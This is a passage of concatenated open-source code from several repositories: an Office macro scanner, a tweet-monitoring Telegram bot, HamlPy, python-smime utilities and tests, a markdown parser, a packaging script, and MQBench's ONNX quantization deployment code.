if "(use option --deobf to deobfuscate)" in macroList[fi][2]:
sanitized = f"{macroList[fi][2]}".replace("(use option --deobf to deobfuscate)", "")
answerTable.add_row([f"{yellow}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{sanitized}"])
elif "(option --decode to see all)" in macroList[fi][2]:
sanitized = f"{macroList[fi][2]}".replace("(option --decode to see all)", "")
answerTable.add_row([f"{yellow}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{sanitized}"])
else:
answerTable.add_row([f"{yellow}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
elif macroList[fi][0] == 'IOC':
answerTable.add_row([f"{magenta}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
elif macroList[fi][0] == 'AutoExec':
answerTable.add_row([f"{red}{macroList[fi][0]}{white}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
else:
answerTable.add_row([f"{macroList[fi][0]}", f"{macroList[fi][1]}", f"{macroList[fi][2]}"])
print(f"{answerTable}\n")
else:
print(f"{errorS} Not any VBA macros found.")
    except Exception:
        print(f"{errorS} An error occurred while parsing that file for macro scan.")
# Gathering basic informations
def BasicInfoGa(targetFile):
# Check for ole structures
if isOleFile(targetFile) == True:
print(f"{infoS} Ole File: {green}True{white}")
else:
print(f"{infoS} Ole File: {red}False{white}")
# Check for encryption
if is_encrypted(targetFile) == True:
print(f"{infoS} Encrypted: {green}True{white}")
else:
print(f"{infoS} Encrypted: {red}False{white}")
# VBA_MACRO scanner
vbascan = OleID(targetFile)
vbascan.check()
# Sanitizing the array
vba_params = []
for vb in vbascan.indicators:
vba_params.append(vb.id)
if "vba_macros" in vba_params:
for vb in vbascan.indicators:
if vb.id == "vba_macros":
if vb.value == True:
print(f"{infoS} VBA Macros: {green}Found{white}")
MacroHunter(targetFile)
else:
print(f"{infoS} VBA Macros: {red}Not Found{white}")
else:
MacroHunter(targetFile)
# A function that handles file types, extensions etc.
def MagicParser(targetFile):
# Defining table
resTable = PrettyTable()
# Magic byte parsing
resCounter = 0
resTable.field_names = [f"File Extension", "Names", "Byte Matches", "Confidence"]
resourceList = list(pr.magic_file(targetFile))
for res in range(0, len(resourceList)):
extrExt = str(resourceList[res].extension)
extrNam = str(resourceList[res].name)
extrByt = str(resourceList[res].byte_match)
if resourceList[res].confidence >= 0.8:
resCounter += 1
if extrExt == '':
resTable.add_row([f"{red}No Extension{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
else:
resTable.add_row([f"{red}{extrExt}{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
if len(resourceList) != 0:
print(resTable)
# Execution area
try:
BasicInfoGa(targetFile)
print(f"\n{infoS} Performing magic number analysis...")
MagicParser(targetFile)
except Exception:
    print(f"{errorS} An error occurred while analyzing that file.")
sys.exit(1)
``` |
{
"source": "A1S0N/TweetsMonitor",
"score": 3
} |
#### File: A1S0N/TweetsMonitor/main.py
```python
from twitter import *
import telepot
bot = telepot.Bot('#')  # '#' stands in for the redacted bot token
myId = '#'
config = {}
execfile("config.py", config)
twitter = Twitter(
auth = OAuth(config["access_key"], config["access_secret"], config["consumer_key"], config["consumer_secret"]))
user = "@A1S0N_"
results = twitter.statuses.user_timeline(screen_name = user)
def main():
f = open('tweets.tw','r+')
content = f.read()
for status in results:
var = status["text"].encode("ascii", "ignore")
if var in content:
pass
else:
bot.sendMessage(myId, var)
f.write(var)
f.close()
main()
``` |
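Two caveats in `main()` above: `var in content` is a substring test against the whole history file, so a tweet that is a prefix of an earlier one is silently skipped, and `open('tweets.tw', 'r+')` fails on first run. A line-based sketch of the same dedupe idea (an alternative, not the repository's code; message delivery is left to the caller):

```python
def send_new_tweets(statuses, seen_path="tweets.tw"):
    try:
        with open(seen_path) as f:
            seen = set(f.read().splitlines())
    except IOError:  # first run: no history file yet
        seen = set()
    with open(seen_path, "a") as f:
        for status in statuses:
            text = status["text"].replace("\n", " ")
            if text not in seen:
                seen.add(text)
                f.write(text + "\n")
                # bot.sendMessage(myId, text)  # hook delivery in here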
{
"source": "a1s/HamlPy",
"score": 2
} |
#### File: HamlPy/hamlpy/templatize.py
```python
try:
from django.utils import translation
_django_available = True
except ImportError:
_django_available = False
import hamlpy
import os
def decorate_templatize(func):
def templatize(src, origin=None, **kwargs):
#if the template has no origin file then do not attempt to parse it with haml
if origin:
#if the template has a source file, then only parse it if it is haml
if os.path.splitext(origin)[1].lower() in ['.'+x.lower() for x in hamlpy.VALID_EXTENSIONS]:
hamlParser = hamlpy.Compiler()
src = hamlParser.process(src)
return func(src, origin=origin, **kwargs)
return templatize
if _django_available:
translation.templatize = decorate_templatize(translation.templatize)
```
#### File: hamlpy/test/test_elements.py
```python
from nose.tools import eq_
from hamlpy.elements import Element
class TestElement(object):
def test_attribute_value_not_quoted_when_looks_like_key(self):
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{name:"viewport", content:"width:device-width, initial-scale:1, minimum-scale:1, maximum-scale:1"}''')
eq_(s1['content'], "content='width:device-width, initial-scale:1, minimum-scale:1, maximum-scale:1'")
eq_(s1['name'], "name='viewport'")
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{style:"a:x, b:'y', c:1, e:3"}''')
eq_(s1['style'], "style='a:x, b:\\'y\\', c:1, e:3'")
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{style:"a:x, b:'y', c:1, d:\\"dk\\", e:3"}''')
eq_(s1['style'], "style='a:x, b:\\'y\\', c:1, d:\"dk\", e:3'")
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{style:'a:x, b:\\'y\\', c:1, d:"dk", e:3'}''')
eq_(s1['style'], "style='a:x, b:\\'y\\', c:1, d:\"dk\", e:3'")
def test_dashes_work_in_attribute_quotes(self):
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{"data-url":"something", "class":"blah"}''')
eq_(s1['data-url'], "data-url='something'")
eq_(s1['class'], 'blah')
s1 = sut._parse_attribute_dictionary('''{data-url:"something", class:"blah"}''')
eq_(s1['data-url'], "data-url='something'")
eq_(s1['class'], 'blah')
def test_escape_quotes_except_django_tags(self):
sut = Element('')
s1 = sut._escape_attribute_quotes('''{% url 'blah' %}''')
eq_(s1,'''{% url 'blah' %}''')
s2 = sut._escape_attribute_quotes('''blah's blah''s {% url 'blah' %} blah's blah''s''')
eq_(s2,r"blah\'s blah\'\'s {% url 'blah' %} blah\'s blah\'\'s")
def test_attributes_parse(self):
sut = Element('')
s1 = sut._parse_attribute_dictionary('''{a:'something',"b":None,'c':2}''')
eq_(s1['a'], "a='something'")
eq_(s1['b'], "b")
eq_(s1['c'], "c='2'")
eq_(sut.attributes, "a='something' b c='2'")
def test_pulls_tag_name_off_front(self):
sut = Element('%div.class')
eq_(sut.tag, 'div')
def test_default_tag_is_div(self):
sut = Element('.class#id')
eq_(sut.tag, 'div')
def test_parses_id(self):
sut = Element('%div#someId.someClass')
eq_(sut.id, 'someId')
sut = Element('#someId.someClass')
eq_(sut.id, 'someId')
def test_no_id_gives_empty_string(self):
sut = Element('%div.someClass')
eq_(sut.id, '')
def test_parses_class(self):
sut = Element('%div#someId.someClass')
eq_(sut.classes, 'someClass')
def test_properly_parses_multiple_classes(self):
sut = Element('%div#someId.someClass.anotherClass')
eq_(sut.classes, 'someClass anotherClass')
def test_no_class_gives_empty_string(self):
sut = Element('%div#someId')
eq_(sut.classes, '')
def test_attribute_dictionary_properly_parses(self):
sut = Element("%html{'xmlns':'http://www.w3.org/1999/xhtml', 'xml:lang':'en', 'lang':'en'}")
assert "xmlns='http://www.w3.org/1999/xhtml'" in sut.attributes
assert "xml:lang='en'" in sut.attributes
assert "lang='en'" in sut.attributes
def test_id_and_class_dont_go_in_attributes(self):
sut = Element("%div{'class':'hello', 'id':'hi'}")
assert 'class=' not in sut.attributes
assert 'id=' not in sut.attributes
def test_attribute_merges_classes_properly(self):
sut = Element("%div.someClass.anotherClass{'class':'hello'}")
assert 'someClass' in sut.classes
assert 'anotherClass' in sut.classes
assert 'hello' in sut.classes
def test_attribute_merges_ids_properly(self):
sut = Element("%div#someId{'id':'hello'}")
eq_(sut.id, 'someId_hello')
def test_can_use_arrays_for_id_in_attributes(self):
sut = Element("%div#someId{'id':['more', 'andMore']}")
eq_(sut.id, 'someId_more_andMore')
def test_self_closes_a_self_closing_tag(self):
sut = Element(r"%br")
assert sut.self_close
def test_does_not_close_a_non_self_closing_tag(self):
sut = Element("%div")
assert sut.self_close == False
def test_can_close_a_non_self_closing_tag(self):
sut = Element("%div/")
assert sut.self_close
def test_properly_detects_django_tag(self):
sut = Element("%div= $someVariable")
assert sut.django_variable
def test_knows_when_its_not_django_tag(self):
sut = Element("%div Some Text")
assert sut.django_variable == False
def test_grabs_inline_tag_content(self):
sut = Element("%div Some Text")
eq_(sut.inline_content, 'Some Text')
def test_multiline_attributes(self):
sut = Element("""%link{'rel': 'stylesheet', 'type': 'text/css',
'href': '/long/url/to/stylesheet/resource.css'}""")
assert "href='/long/url/to/stylesheet/resource.css'" in sut.attributes
assert "type='text/css'" in sut.attributes
assert "rel='stylesheet'" in sut.attributes
``` |
{
"source": "a1s/python-smime",
"score": 4
} |
#### File: python-smime/smime/print_util.py
```python
def bits_to_hex(bit_array, delimiter=":"):
"""Convert a bit array to a prettily formated hex string. If the array
length is not a multiple of 8, it is padded with 0-bits from the left.
For example, [1,0,0,1,1,0,1,0,0,1,0] becomes 04:d2.
Args:
bit_array: the bit array to convert
Returns:
the formatted hex string."""
# Pad the first partial byte.
partial_bits = len(bit_array) % 8
pad_length = 8 - partial_bits if partial_bits else 0
bitstring = "0" * pad_length + "".join(map(str, bit_array))
byte_array = [int(bitstring[i: i + 8], 2) for i in range(0, len(bitstring), 8)]
return delimiter.join(map(lambda x: "%02x" % x, byte_array))
def bytes_to_hex(byte_string, delimiter=":"):
"""Convert a bytestring to a prettily formated hex string: for example,
'\x04\xd2' becomes 04:d2.
Args:
byte_string: the bytes to convert.
Returns:
the formatted hex string."""
return delimiter.join([("%02x" % ord(b)) for b in byte_string])
def int_to_hex(int_value, delimiter=":"):
"""Convert an integer to a prettily formated hex string: for example,
1234 (0x4d2) becomes 04:d2 and -1234 becomes ' -:04:d2'
Args:
int_value: the value to convert.
Returns:
the formatted hex string."""
hex_string = "%x" % int_value
ret = ""
pos = 0
# Accommodate for negative integers.
if hex_string[0] == "-":
ret += " -" + delimiter
hex_string = hex_string[1:]
# If the first digit is a half-byte, pad with a 0.
remaining_len = len(hex_string) - pos
hex_string = hex_string.zfill(remaining_len + remaining_len % 2)
byte_values = [hex_string[i: i + 2] for i in range(pos, len(hex_string), 2)]
return ret + delimiter.join(byte_values)
def wrap_lines(long_string, wrap):
"""Split the long string into line chunks according to the wrap limit and
existing newlines.
Args:
long_string: a long, possibly multiline string
wrap: maximum number of characters per line. 0 or negative
wrap means no limit.
Returns:
a list of lines of at most |wrap| characters each."""
if not long_string:
return []
    if isinstance(long_string, bytes):
        long_string = long_string.decode("utf-8")
    long_lines = long_string.split("\n")
if wrap <= 0:
return long_lines
ret = []
for line in long_lines:
if not line:
# Empty line
ret += [line]
else:
ret += [line[i: i + wrap] for i in range(0, len(line), wrap)]
return ret
def append_lines(lines, wrap, buf):
"""Append lines to the buffer. If the first line can be appended to the last
line of the buf without exceeding wrap characters, the two lines are merged.
Args:
lines: an iterable of lines to append
wrap: maximum number of characters per line. 0 or negative wrap means
no limit.
buf: an iterable of lines to append to"""
if not lines:
return
    if not buf or (wrap > 0 and len(buf[-1]) + len(lines[0]) > wrap):
buf += lines
else:
buf[-1] += lines[0]
buf += lines[1:]
```
#### File: smime/tests/test_encrypt.py
```python
import os
import sys
from email import message_from_string
from subprocess import PIPE
from subprocess import Popen
from tempfile import mkstemp
from smime.api import encrypt
def get_cmd_output(args):
child = Popen(args, stdout=PIPE, stderr=PIPE)
result = []
while True:
for line in iter(child.stdout.readline, ""):
result.append(line)
if child.poll() is not None:
break
if child.returncode != 0:
error = []
for line in iter(child.stderr.readline, ""):
error.append(line)
sys.stderr.write("Command: %s\n%s" % (" ".join(args), "".join(error)))
return "\n".join(result)
def assert_message_to_carl(settings, algorithm):
message = [
'From: "Alice" <<EMAIL>>',
'To: "Carl" <<EMAIL>>',
"Subject: A message from python",
"",
"Now you see me.",
]
with open(settings['carl_public_certificate']) as cert:
result = encrypt(u"\n".join(message), cert.read(), algorithm=algorithm)
fd, tmp_file = mkstemp()
os.write(fd, result)
cmd = [
"openssl",
"smime",
"-decrypt",
"-in",
tmp_file,
"-inkey",
settings['carl_private_certificate'],
]
cmd_output = get_cmd_output(cmd)
private_message = message_from_string(cmd_output)
payload = private_message.get_payload().splitlines()
assert "Now you see me." == payload[len(payload) - 1]
return 1
def test_message_to_carl_aes256_cbc(base_settings):
settings = base_settings
assert assert_message_to_carl(settings, u"aes256_cbc") == 1
def test_message_to_carl_aes192_cbc(base_settings):
settings = base_settings
assert assert_message_to_carl(settings, u"aes192_cbc") == 1
def test_message_to_carl_aes128_cbc(base_settings):
settings = base_settings
assert assert_message_to_carl(settings, u"aes128_cbc") == 1
```
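For reference, the `encrypt` call exercised by these tests reduces to the following minimal sketch (the addresses and certificate path are placeholders):

```python
from smime.api import encrypt

message = u"\n".join([
    'From: "Alice" <<EMAIL>>',
    'To: "Carl" <<EMAIL>>',
    "Subject: A message from python",
    "",
    "Now you see me.",
])
with open("carl_public.pem") as cert:  # recipient's certificate (placeholder path)
    smime_message = encrypt(message, cert.read(), algorithm=u"aes256_cbc")
print(smime_message)  # S/MIME blob, decryptable with the matching private key
```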
#### File: smime/tests/test_print_util.py
```python
from smime import print_util
def test_bits_to_hex():
bit_array = [0, 1, 1, 0, 1, 0, 1, 1, 1, 0]
assert "01:ae" == print_util.bits_to_hex(bit_array)
assert "01ae" == print_util.bits_to_hex(bit_array, delimiter="")
assert "" == print_util.bits_to_hex("")
def test_bytes_to_hex():
byte_array = "\x01\xae"
assert "01:ae" == print_util.bytes_to_hex(byte_array)
assert "01ae" == print_util.bytes_to_hex(byte_array, delimiter="")
assert "" == print_util.bytes_to_hex("")
def test_int_to_hex():
integer = 1234 # 0x4d2
assert "04:d2" == print_util.int_to_hex(integer)
assert "04d2" == print_util.int_to_hex(integer, delimiter="")
negative_integer = -1234
assert " -:04:d2" == print_util.int_to_hex(negative_integer)
def test_wrap_lines():
long_multiline_string = "hello\nworld"
assert ["hel", "lo", "wor", "ld"] == print_util.wrap_lines(long_multiline_string, 3)
def test_wrap_lines_no_wrap():
long_multiline_string = "hello\nworld"
assert ["hello", "world"] == print_util.wrap_lines(long_multiline_string, 0)
def test_append_lines_appends():
buf = ["hello"]
lines = ["beautiful", "world"]
# "hellobeautiful" is more than 10 characters long
print_util.append_lines(lines, 20, buf)
assert ["hellobeautiful", "world"] == buf
def test_append_lines_honours_wrap():
buf = ["hello"]
lines = ["beautiful", "world"]
# "hellobeautiful" is more than 10 characters long
print_util.append_lines(lines, 10, buf)
assert ["hello", "beautiful", "world"] == buf
``` |
{
"source": "a1trl9/curris",
"score": 3
} |
#### File: curris/curris/block.py
```python
from curris import helper
from curris.span import parse_span
def parse_block(line, target, attrs):
"""main function
"""
if line == -1:
_try_finalize_table(target, attrs)
return target
length = len(line)
if length == 0:
_try_finalize_table(target, attrs)
target.append({'block_type': 'blank'})
return target
result = _handle_code_block(line, length, target, attrs) or\
_handle_table(line, length, target, attrs)
if result:
return target
_try_finalize_table(target, attrs)
result = _handle_header(line, length, target)
if result:
return target
result = _check_block_quotes(line, length) or _check_unorder_list_item(line, length) or \
_check_order_list_item(line, length)
if result:
target.append(result)
else:
_handle_indent(line, length, target, attrs)
return target
def _handle_code_block(line, length, target, attrs):
result = _check_code_block(line, length)
if result:
attrs['code_block'] = not attrs['code_block']
target.append(result)
return True
if attrs['code_block']:
target.append({'block_type': 'code', 'content': line})
return True
return False
def _handle_table(line, length, target, attrs):
result = _check_table(line, length)
if result:
if not attrs['table_block']:
attrs['table_block'] = True
target.append(result)
return True
return False
def _handle_header(line, length, target):
result = _check_header(line, length)
if result:
if 'prev_block_type' in result and target:
if 'indent' in target[-1]:
del target[-1]['indent']
target[-1]['block_type'] = result['prev_block_type']
else:
target.append(result)
return True
return False
def _try_finalize_table(target, attrs):
if attrs['table_block']:
attrs['table_block'] = False
_build_table(target)
def _handle_indent(line, length, target, attrs):
result = _check_indent(line, length)
if result['indent'] == 0:
del result['indent']
if target and ('block_type' not in target[-1] or \
target[-1]['block_type'] in ['normal', 'block_quotes']):
target[-1]['content'].append({'span_type': 'text', 'content': '\n'})
target[-1]['content'].append(result['content'])
else:
target.append(result)
elif target and 'block_type' in target[-1] and target[-1]['block_type'] in\
['order_list_item', 'unorder_list_item', 'block_quotes']:
parse_block(result['content'][0], target[-1]['content'], {'code_block': False,
'table_block': False})
else:
parse_block(result['content'][0], target, attrs)
def _check_header(line, length):
"""check if headers
first_header_line :: <=>+
second_header_line :: <->+
normal_header :: <#>+<span_element>
"""
if length * '=' == line:
return {'prev_block_type': 'h1'}
if length * '-' == line:
return {'prev_block_type': 'h2'}
if length > 0 and line[0] == '#':
index = 1
while index < length and line[index] == '#':
index += 1
level = min(6, index)
# Ignore any ending '#'
end_index = length - 1
while end_index >= 0 and line[end_index] == '#':
end_index -= 1
index += helper.elimate_leading_whitespace(line[index:])
return {'block_type': 'h{}'.format(level),
'content': [parse_span(line[index:end_index + 1], [])]}
def _check_block_quotes(line, length):
""" check if blockquotes
block_quotes :: <rab>+<block_element>
"""
if length > 0 and line[0] == '>':
index = 1
index += helper.elimate_leading_whitespace(line[index:])
new_attrs = {'code_block': False, 'table_block': False}
return {'block_type': 'block_quotes', 'content': parse_block(line[index:], [], new_attrs)}
def _check_unorder_list_item(line, length):
"""check if unorder lists
"""
if length > 1 and line[0] in '-*+' and line[1] == ' ':
return {'block_type': 'unorder_list_item', 'content':[parse_span(line[2:], [])]}
def _check_order_list_item(line, length):
"""check if order lists
"""
index = 0
while index < length and line[index].isdecimal():
index += 1
if index + 1 < length and line[index] == '.' and line[index + 1] == ' ':
return {'block_type': 'order_list_item', 'content': [parse_span(line[index + 2:], [])]}
def _check_code_block(line, length):
"""check if code block
"""
if length > 2 and line[:3] == '```':
language = line[3:]
return {'block_type': 'code_block', 'language': language}
def _check_indent(line, length):
if length > 1 and line[0] == '\t':
return {'indent': 1, 'content': [line[1:]]}
elif line[:4] == ' ' * 4:
return {'indent': 1, 'content': [line[4:]]}
return {'indent': 0, 'content': [parse_span(line, [])], 'block_type': 'normal'}
def _build_table(target):
table = []
while target and target[-1]['block_type'] == 'potential_table':
table.append(target.pop())
table = table[::-1]
length = len(table)
if length < 2:
_build_table_as_normal(target, table)
return
# check header
sep_line = table[1]
is_seps = _check_table_seps(sep_line['content'], sep_line['seps'])
if not is_seps['is_seps']:
_build_table_as_normal(target, table)
return
info = is_seps['content']
header = _check_table_content(table[0]['content'], table[0]['seps'],
info, True)
content = [_check_table_content(i['content'], i['seps'], info)\
for i in table[2:]]
table = {'block_type': 'table', 'content': {
'header': header,
'body': content
}}
target.append(table)
def _build_table_as_normal(target, table):
content = [parse_span(i['content'], []) for i in table]
if target and target[-1]['block_type'] == 'normal':
for unit in content:
target[-1]['content'].append(unit)
else:
target.append({'block_type': 'normal', 'content': content})
def _check_table_seps(line, seps):
index = 0
length = len(line)
content = []
if seps and seps[0] == 0:
index += 1
seps = seps[1:]
for sep in seps:
content.append(line[index:sep])
index = sep + 1
if seps and seps[-1] + 1 < length:
content.append(line[index:])
for unit in content:
if len(unit) < 3:
break
if '---' not in unit or unit[0] not in ':-' or unit[-1] not in ':-':
break
else:
for index, unit in enumerate(content):
if unit[-1] == ':' and unit[0] == ':':
content[index] = 1
elif unit[-1] == ':':
content[index] = 2
else:
content[index] = 0
return {'is_seps': True, 'content': content}
return {'is_seps': False}
def _check_table_content(line, seps, info, is_header=False):
symbol = 'th' if is_header else 'td'
index = 0
length = len(line)
content = []
required = len(info)
if seps and seps[0] == 0:
index += 1
seps = seps[1:]
for sep in seps:
content.append(line[index:sep])
index = sep + 1
if seps and seps[-1] + 1 < length:
content.append(line[index:])
for index, unit in enumerate(content):
content[index] = {'block_type': symbol, 'content': parse_span(unit, []),
'align': info[index]}
c_length = len(content)
while c_length < required:
content.append({'block_type': symbol, 'content': parse_span('', []),
'align': info[c_length]})
c_length += 1
return {'block_type': 'tr', 'content': content}
def _check_table(line, length):
index = 0
if '|' in line:
seps = []
while index < length:
if line[index] == '\\':
index += 2
continue
if line[index] == '|':
seps.append(index)
index += 1
return {'block_type': 'potential_table', 'seps': seps,
'content': line}
```
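A usage sketch for the block parser (assumed from the signatures above, not shipped with curris): feed one line at a time, then pass the `-1` end-of-input sentinel so any pending table is finalized.

```python
from curris.block import parse_block

target, attrs = [], {'code_block': False, 'table_block': False}
for line in ["# Title", "", "- item one", "- item two"]:
    parse_block(line, target, attrs)
parse_block(-1, target, attrs)  # sentinel flushes potential_table entries
print(target)  # e.g. [{'block_type': 'h1', ...}, {'block_type': 'blank'}, ...]
```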
#### File: curris/curris/cli.py
```python
import argparse
import json
from curris.parser import parse
from curris.render.html import build_html
from curris.render.render_to_file import render_to_file
def _build_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-html', action='store_true', help='render to html')
parser.add_argument('-css', help='add css source file')
parser.add_argument('-style', help='add css style string')
parser.add_argument('-o', help='output file path')
parser.add_argument('-s', help='source file path')
return parser
def main():
""" cli entry
"""
arg_parser = _build_arg_parser()
args = arg_parser.parse_args()
if not args.s:
return
parsed = ''
with open(args.s) as reader:
target = reader.read()
parsed = parse(target)
if args.html:
file_type = 'html'
css_source = args.css if args.css else None
css_string = args.style if args.style else None
rendered = build_html(parsed, css_source, css_string)
else:
file_type = 'json'
rendered = json.dumps(parsed)
if args.o:
render_to_file(rendered, args.o)
else:
file_path = 'output.' + file_type
render_to_file(rendered, file_path)
```
#### File: curris/render/render_to_file.py
```python
def render_to_file(content, path):
""" render entry
"""
with open(path, 'w') as writer:
writer.write(content)
``` |
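Mirroring `cli.main()` as a library call, the whole pipeline is three steps (the file paths here are hypothetical):

```python
from curris.parser import parse
from curris.render.html import build_html
from curris.render.render_to_file import render_to_file

with open('input.md') as reader:
    parsed = parse(reader.read())
rendered = build_html(parsed, None, None)  # no css source file, no inline css string
render_to_file(rendered, 'output.html')
```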
{
"source": "a1trl9/flatwhite",
"score": 2
} |
#### File: a1trl9/flatwhite/setup.py
```python
import sys
from distutils.command.build_ext import build_ext
from setuptools import setup, Extension
from setuptools.command.test import test as Test
class PyTest(Test):
""" pytest class
"""
def finalize_options(self):
Test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
setup(
name='flatwhite',
version='0.0.1',
license='MIT License',
author='a1trl9',
tests_require=['pytest'],
install_requires=[],
packages=['flatwhite'],
cmdclass={'test': PyTest},
author_email='<EMAIL>',
description='ED Algorithm',
include_package_data=True,
platforms='any',
# test_suite='',
classifiers=[
'Programming Language :: Python',
        'Development Status :: 3 - Alpha',
        'License :: OSI Approved :: MIT License',
'License :: MIT License',
'Operating System :: OS Independent',
'Topic :: Global/Local Edit Distance'
],
extras_require={
'testing': ['pytest']
},
ext_modules=[
Extension('flatwhite.cflatwhite',
['cflatwhite/dr.c',
'cflatwhite/ged.c',
'cflatwhite/led.c',
'cflatwhite/tf_idf.c',
'cflatwhite/ngram.c',
'cflatwhite/hashmap.c',
]
)
]
)
``` |
{
"source": "a1trl9/MQBench",
"score": 2
} |
#### File: mqbench/deploy/deploy_linear.py
```python
import json
import os
import onnx
import numpy as np
from onnx import numpy_helper
from mqbench.utils.logger import logger
from mqbench.deploy.common import (
update_inp2node_out2node,
prepare_initializer,
prepare_data,
OnnxPreprocess,
get_constant_inputs,
parse_attrs
)
try:
from .convert_xir import XIR_process
USE_XIR = True
except (ModuleNotFoundError, AssertionError, ImportError):
USE_XIR = False
PERCHANNEL_FAKEQUANTIZER = ['FakeQuantizeLearnablePerchannelAffine',
'FixedPerChannelAffine',
'FakeQuantizeDSQPerchannel']
PERTENSOR_FAKEQUANTIZER = ['LearnablePerTensorAffine',
'FixedPerTensorAffine',
'FakeQuantizeDSQPertensor',
'FakeQuantizeTqtAffine']
ALL_FAKEQUANTIZER = PERCHANNEL_FAKEQUANTIZER + PERTENSOR_FAKEQUANTIZER
class LinearQuantizer_process(object):
# some method like dorefa need pre-compute weights
def weight_preprocess(self, target_tensor, out2node, inp2node, named_initializer):
def find_weight(tensor):
if tensor not in named_initializer:
_node = out2node[tensor]
for inp in _node.input:
return find_weight(inp)
return tensor
weight = find_weight(target_tensor)
# TODO need more general method, like onnxruntime infer
data = numpy_helper.to_array(named_initializer[weight])
data = np.tanh(data)
data = data / (np.max(np.abs(data)) + 1e-5)
data = numpy_helper.from_array(data)
named_initializer[weight].raw_data = data.raw_data
redundant_nodes = []
def find_redundant_nodes(tensor):
if tensor == target_tensor:
return
nodes = inp2node[tensor]
for node, idx in nodes:
if node not in redundant_nodes:
redundant_nodes.append(node)
redundant_nodes.extend(get_constant_inputs(node, out2node))
find_redundant_nodes(node.output[0])
find_redundant_nodes(weight)
return weight, redundant_nodes
def deal_with_weight_fakequant(self, node, out2node, inp2node, named_initializer):
next_nodes = inp2node[node.output[0]]
assert len(next_nodes) == 1
next_node, idx = next_nodes[0]
assert next_node.op_type in ['Conv', 'Gemm', 'ConvTranspose']
redundant_nodes = []
if node.input[0] not in named_initializer:
node.input[0], redundant_nodes = \
self.weight_preprocess(node.input[0], out2node, inp2node, named_initializer)
next_node.input[idx] = node.input[0]
return redundant_nodes
def deal_with_activation_fakequant(self, node, inp2node):
next_nodes = inp2node[node.output[0]]
for next_node, idx in next_nodes:
next_node.input[idx] = node.input[0]
return
def parse_qparams(self, node, name2data):
tensor_name, scale, zero_point = node.input[:3]
scale, zero_point = name2data[scale], name2data[zero_point]
if len(node.input) > 3:
qmin, qmax = node.input[-2:]
qmin, qmax = name2data[qmin], name2data[qmax]
elif len(node.attribute) > 0:
qparams = parse_attrs(node.attribute)
qmin = qparams['quant_min']
qmax = qparams['quant_max']
        else:
            logger.info(f'qmin and qmax are not found for <{node.name}>!')
            qmin = qmax = None  # avoid a NameError when qparams are missing
return tensor_name, scale, zero_point, qmin, qmax
def clip_weight(self, node, name2data, inp2node, named_initializer):
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
data = name2data[tensor_name]
clip_range_min = (qmin - zero_point) * scale
clip_range_max = (qmax - zero_point) * scale
if scale.shape[0] > 1:
new_data = []
transposed = False
next_node = inp2node[node.output[0]]
if len(next_node) == 1 and next_node[0][0].op_type == 'ConvTranspose':
transposed = True
data = data.transpose(1, 0, 2, 3)
for c in range(data.shape[0]):
new_data.append(np.clip(data[c], clip_range_min[c], clip_range_max[c]))
new_data = np.array(new_data)
if transposed:
new_data = new_data.transpose(1, 0, 2, 3)
logger.info(f'Clip weights <{tensor_name}> to per-channel ranges.')
else:
new_data = np.clip(data, clip_range_min, clip_range_max)
logger.info(f'Clip weights <{tensor_name}> to range [{clip_range_min}, {clip_range_max}].')
new_data = numpy_helper.from_array(new_data)
named_initializer[tensor_name].raw_data = new_data.raw_data
def post_process_clip_ranges(self, clip_ranges, graph, inp2node):
def find_the_closest_clip_range(node):
if node.input[0] in clip_ranges:
return node.input[0]
elif node.op_type in ['Flatten', 'Resize'] and node.output[0] in inp2node:
return find_the_closest_clip_range(inp2node[node.output[0]][0][0])
else:
return None
for node in graph.node:
if node.op_type in ['Flatten', 'Resize']:
tensor_name = find_the_closest_clip_range(node)
if tensor_name:
clip_ranges[node.input[0]] = clip_ranges[tensor_name]
logger.info(f'Pass <{tensor_name}> clip range to <{node.name}> input <{node.input[0]}>.')
return clip_ranges
def remove_fakequantize_and_collect_params(self, onnx_path, model_name, backend):
model = onnx.load(onnx_path)
graph = model.graph
out2node, inp2node = update_inp2node_out2node(graph)
name2data = prepare_data(graph)
named_initializer = prepare_initializer(graph)
preprocess = OnnxPreprocess()
preprocess.replace_resize_op_with_upsample(graph, out2node)
preprocess.remove_fake_pad_op(graph, name2data, inp2node, out2node)
out2node, inp2node = update_inp2node_out2node(graph)
clip_ranges = {}
nodes_to_be_removed = []
for node in graph.node:
if node.op_type in ALL_FAKEQUANTIZER:
nodes_to_be_removed.append(node)
nodes_to_be_removed.extend(get_constant_inputs(node, out2node))
if node.op_type in PERCHANNEL_FAKEQUANTIZER:
                    # fake quantize for weights; assume per-channel quantization is used only for weights
redundant_nodes = self.deal_with_weight_fakequant(node, out2node, inp2node, named_initializer)
nodes_to_be_removed.extend(redundant_nodes)
self.clip_weight(node, name2data, inp2node, named_initializer)
if backend == 'ppl':
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
clip_ranges[tensor_name] = {'step': [float(x) for x in scale],
'zero_point': [int(x) for x in zero_point],
'min': [float(x) for x in scale * (qmin - zero_point)],
'max': [float(x) for x in scale * (qmax - zero_point)],
'bit': int(np.log2(qmax - qmin + 1)),
'type': "biased",
}
elif backend == 'vitis':
logger.info("Vitis-DPU does not support per-channel quatization.")
raise NotImplementedError("Vitis-DPU does not support per-channel quatization.")
elif node.op_type in PERTENSOR_FAKEQUANTIZER:
if node.output[0] not in inp2node:
assert node.output[0] in [l.name for l in graph.output]
inp2node[node.output[0]] = []
next_nodes = inp2node[node.output[0]]
if len(next_nodes) == 1 and next_nodes[0][1] == 1 and next_nodes[0][0].op_type in ['Gemm', 'Conv']:
# fake quantize for weights
